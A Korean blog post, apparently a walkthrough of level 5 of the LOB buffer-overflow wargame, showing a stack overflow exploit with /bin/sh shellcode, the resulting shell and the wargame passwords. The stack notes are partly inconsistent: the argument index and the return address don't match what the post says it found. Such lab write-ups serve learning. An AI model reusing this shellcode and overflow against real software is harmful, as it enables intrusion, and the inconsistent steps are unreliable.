반응형
LOB level 5.
pw = 'cantata'
44byte만큼 할당.
0,40,buffer 순서로 인자를 전달하고 memset 함수를 호출.
이게 buffer hunter 부분.즉 스택 구조를 보면
buffer[40] I SFP RET 쓰레기 값 argv[2] 이렇게 있다.
일단 전 문제랑 똑같이 풀면 된다.
argv[2]을 시작 주소를 찾아본다. 디스어셈했을 때, strcpy 함수에 argv[1]를 썼으니 찾는다.
일단 main+194에 브레이크 포인트 걸고, 실행.
브레이크 포인트가 나온 뒤 41이 나왔다. 시작 주소는 0xbffffc44.
이제 마지막으로 작성.
[orc@localhost orc]$./wolfman 'python -c 'print "A"*44 + "\x01\xfb\xff\xbf" + "\x90\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"'' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA? bash$ whoami wolfman bash$ my-pass euid = 505 love eyuna bash$
반응형
'# Related site issues > LOB' 카테고리의 다른 글
| LOB Level 7. (0) | 2018.03.28 |
|---|---|
| LOB Level 6. (0) | 2018.03.28 |
| LOB Level 4. (0) | 2018.03.27 |
| LOB Level 3. (0) | 2018.03.27 |
| LOB Level 2. (0) | 2018.03.27 |
